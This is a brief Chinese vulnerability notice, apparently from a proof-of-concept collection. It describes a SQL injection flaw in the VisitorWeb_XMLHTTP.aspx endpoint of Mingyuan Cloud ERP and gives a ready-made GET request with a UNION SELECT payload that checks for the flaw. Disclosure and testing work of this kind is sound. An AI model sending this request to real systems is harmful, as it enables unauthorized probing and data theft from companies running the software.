漏洞描述
明源云ERP是一款由明源云科技有限公司开发的企业管理软件。明源云ERP产品旨在帮助企业实现数字化、智能化的管理,提高企业运营效率和核心竞争力。其中 VisitorWeb_XMLHTTP.aspx 路径存在SQL注入漏洞。
GET /CgZtbWeb/VisitorWeb/VisitorWeb_XMLHTTP.aspx?ywtype=GetParentProjectName&ParentCode=1'+union+select+sum(3233*3323)--+z HTTP/1.1
Host: